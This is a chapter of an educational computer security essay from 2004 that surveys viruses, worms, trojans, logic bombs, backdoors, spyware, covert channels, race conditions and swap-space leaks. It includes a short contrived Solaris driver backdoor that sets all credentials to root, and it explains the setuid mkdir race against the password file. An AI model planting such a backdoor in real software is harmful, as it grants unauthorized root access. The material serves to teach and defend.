kernelthread.com

A Taste of Computer Security

© Amit Singh. All Rights Reserved. Written in June 2004


Security Uprooting Vehicles

Misbehaving programs, including those that seem to have a life of their own, have long been part of computing. Any system is only as secure as its weakest point, and every system built so far has had several.

Digital Life

Some pioneers of computing were working on creating "digital life" long before computer viruses and worms existed: either in the minds of science fiction writers or in "real" life. John von Neumann conceived cellular automata — dynamical systems with discrete space, time, and state — in the late 1940s. Neumann believed that logic was the eventual basis of life, and therefore it must be possible to support life through a construct that supports logic. A very popular cellular automaton is Life (often called the Game of Life). Invented in 1970 by John H. Conway, Life is a Universal cellular automaton — it can effectively emulate any cellular automaton.

Although Neumann used discrete models for self-reproduction, he intended to develop a continuous model later.

Let us briefly consider general (not strict) definitions of some common types of digital life. In the next sections, we will look at worms and viruses in greater detail.

Viruses

Viruses have become an accepted, although highly disruptive and expensive to deal with, part of mainstream computing. It is common to see corporate computers deployed with virus hotline stickers.

Viruses are pieces of software that can attach themselves to executable files, disk boot sectors, documents (whose loading is likely to cause embedded code execution at some point), and may even additionally hide elsewhere in the operating system, including the kernel. These "infected" entities become carriers of a virus's malicious code, and thereby allow it to self-replicate.

Another way to look at this is that viruses can exist for any runtime environment, such as the one providing a platform's primary application binary interface (ABI), macro languages, other interpreters, and so on.

Worms

A worm also self-replicates like a virus, but usually over a network. Worms infiltrate computers usually by exploiting holes in the security of networked systems.

By their nature, worms usually attack programs that are already running. The attack might result in creation of new processes, after which a worm can run independently, and self-propagate. Unlike a virus, a worm may not change existing programs, but like a virus, a worm may have some "payload" code, which in turn may modify existing programs or system configuration.

Bacteria

A not-so-distinct category of digital creatures that is mentioned in literature, albeit rarely, is bacteria. These are programs that replicate themselves and feed off the host system by preempting system resources such as processor time and memory.

Trojan Horses

Like the Greek Trojan horse, these programs have a hidden, negative, subversive, and thus potentially harmful aspect. Trojan horses are programs that masquerade as useful programs, but contain malicious code to attack the system or leak information. An unsuspecting user would typically run a Trojan horse willingly, to use its supposed (advertised) features.

A Trojan horse is sometimes called a Trojan mule. However, doing so taints the allusion.

Ken Thompson talked about a compiler Trojan horse in his Turing Award Lecture (Reflections On Trusting Trust) in 1983. Consider the following quote from the lecture:

"The actual bug I planted in the compiler would match code in the UNIX "login" command. The replacement code would miscompile the login command so that it would accept either the intended encrypted password or a particular known password. Thus if this code were installed in binary and the binary were used to compile the login command, I could log into that system as any user.

Thompson also suggested the additional step of removing this "bug" from the source of the C compiler, by adding a second Trojan horse aimed at the C compiler itself.

It is important to realize that the categories listed above, and the ones that follow, often overlap — sometimes even greatly so. In any case, although such categorization is helpful in explanation, or might be entertaining otherwise, but is not extremely useful in itself.

Some Other Manifestations and Causes of Insecurity

Some other classifications of malicious programs and mechanisms are listed below:

Logic Bombs

A logic bomb is a program that does something, usually malicious (it "explodes"), when some logical condition is satisfied. If the condition is time-related, such programs could also be termed time bombs. Consider some examples of logic bombs:

Backdoors

A backdoor opens a system for access by an external entity: by overthrowing, or bypassing, the local security policies. The goal of a backdoor usually is to allow remote access and control (over a network), although it may also work "locally". Backdoors are sometimes referred to as trapdoors.

Backdoors may exist for various reasons:

Consider some specific, somewhat contrived, examples of backdoors:

/* Solaris */ static int foo_open(dev_t *dev, int openflags, int otyp, cred_t *foo) { int retval = 0; /* use ddi_get_soft_state or something */ foo->cr_uid = 0; foo->cr_gid = 0; foo->cr_ruid = 0; foo->cr_rgid = 0; foo->cr_suid = 0; foo->cr_sgid = 0; return retval; }

Gaining enough privileges (if required) on a system to be able to implant a backdoor is an orthogonal issue.

Spyware

Spyware is apparently useful software that transmits private user data to an external entity, without the user's consent or even knowledge. The external entity stands to gain from the information thus harvested. A common example is that it helps the external entity send targeted advertising to the user.

Spyware constitutes malware because it makes unauthorized use of a system's resources and leaks information (that is, violates privacy). In certain cases, spyware may enter a system not through an apparently useful program, but as payload of another malicious program, such as a worm or a virus.

Covert Channel

Sometimes, an information channel might be used to transfer certain information, possibly malicious, in a way that was not intended by the system's designers. Such a covert channel can be an effective mechanism to help in subversive activities.

As an example, consider this implementation of Towers of Hanoi. The solution uses the ICMP echo/response mechanism (ping) to solve the puzzle. You ping the "Hanoi machine", and you get response packets whose sequence numbers represent the disk moves needed to solve the puzzle.

Race Conditions

Race-conditions are flaws, either in design or implementation, that involve an attacker exploiting a window of time in a sequence of (privileged) non-atomic operations. The window of time exists when a programs checks for a condition, and subsequently uses the result of the check, with the two being non-atomic. Such flaws are also called Time Of Check To Time Of Use (TOCTOU) flaws.

Consider an example. In some early versions of UNIX, mkdir was a setuid program owned by root. Creation of a directory required a mknod system call to allocate storage for the new directory, which would initially be owned by root. In the second step, the chown system call changed the owner of the newly created directory from root to the appropriate user. Since this sequence was not atomic, an attacker could remove the directory before the chown. Thus, doing a rmdir before chown and creating a link to a sensitive file (the password file, for example), would cause the linked file's ownership to be changed.

The following excerpt is from the source of the mkdir command in UNIX V7 (note the explicit calls to link to create '.' and '..'):

mkdir(d) char *d; { char pname[128], dname[128]; register i, slash = 0; pname[0] = '\0'; for(i = 0; d[i]; ++i) if(d[i] == '/') slash = i + 1; if(slash) strncpy(pname, d, slash); strcpy(pname+slash, "."); if (access(pname, 02)) { fprintf(stderr,"mkdir: cannot access %s\n", pname); ++Errors; return; } if ((mknod(d, 040777, 0)) < 0) { fprintf(stderr,"mkdir: cannot make directory %s\n", d); ++Errors; return; } chown(d, getuid(), getgid()); strcpy(dname, d); strcat(dname, "/."); if((link(d, dname)) < 0) { fprintf(stderr, "mkdir: cannot link %s\n", dname); unlink(d); ++Errors; return; } strcat(dname, "."); if((link(pname, dname)) < 0) { fprintf(stderr, "mkdir: cannot link %s\n",dname); dname[strlen(dname)] = '\0'; unlink(dname); unlink(d); ++Errors; } }

Address Space Attacks

The most widely attacked resource in stored program computing is memory. We will look at some common address-space attacks in Defeating Memory.

Waste Searching

"Waste Searching" (or dumpster-diving), that is, looking for sensitive information in areas that are traditionally unprotected, or weakly protected, is a popular and effective security-thwarting approach. Attackers have been known to scavenge printer ribbons, tapes, disk drives, floppy diskettes, garbage paper, and so on. A system's swap space is another potentially lucrative area to look at for sensitive information. Some of these holes could be reasonably plugged through operational (best-practices) means, such as administrative shredding/destruction. Others, such as protecting the swap space, are harder, needing discipline and support from various quarters (programs should proactively ensure that sensitive memory is not swapped out, encrypted swap space could be used, etc.).

File Vault on Mac OS X

There was much hue and cry about File Vault (encrypted disk image) passwords being readable in the swap files on Mac OS X. While you need super-user access to read a swap file, this was considered a serious flaw by many who were counting on nobody, not even the super-user, to be able to access their encrypted home directories. Such a requirement is legitimate, and would be especially relevant if the computer were stolen.

However, the issue is not limited to securing an encrypted filesystem password. An authenticated application that reads data from an encrypted filesystem could be swapped out, and such data could appear as plaintext in the swap space. There is plenty of other sensitive information that could be salvaged from a swap file, possibly including parts of files that you "securely deleted." This could happen even after the system has shut down, and the swap files have been deleted.

In the case of File Vault, some blamed the programmer for failing to ensure that such "critical memory" was not swapped out. Surely you could not possibly prevent all content residing on the encrypted filesystem from being swapped out. The problem could be better solved using an implementation of encrypted swap space, or a robust password mechanism on the disk drive itself.

Note that the problem described herein exists on most operating systems. You can find an implementation of encrypted swap space on OpenBSD, but in general, it is a rarity.

Design Flaws, Oversights, and "This is just how things are"

Sometimes, a system or a protocol may have flaws that show up only later — much after it is deployed. This could be because the designers "missed it", but it could also be because the designers never expected their creation to be used enough, or used in a context where the flaw would "matter". The TCP SYN flood, a widely-used denial of service attack, is due to a (design) flaw in the TCP/IP protocol itself.

Depending upon how widespread the deployment is, and how disruptive the solution is, such flaws may be extremely hard to address.

Another example is that of the sendmail program's -C option, which allowed a user to specify the configuration file to be used. If the file had syntax errors (say, because the file was not even a configuration file), sendmail displayed the offending lines. Thus, sendmail could be used to view sensitive information. Another sendmail oversight, the DEBUG command, was one of the vulnerabilities exploited by the Morris Worm which we shall encounter in a later section.

Finally, social engineering, a strategic methodology of convincing people to divulge sensitive information, is perhaps the most potentially dangerous (and surprisingly easy to accomplish) way to defeat security.

<<< Traditional Unix Security main The Net Growth In Insecurity >>>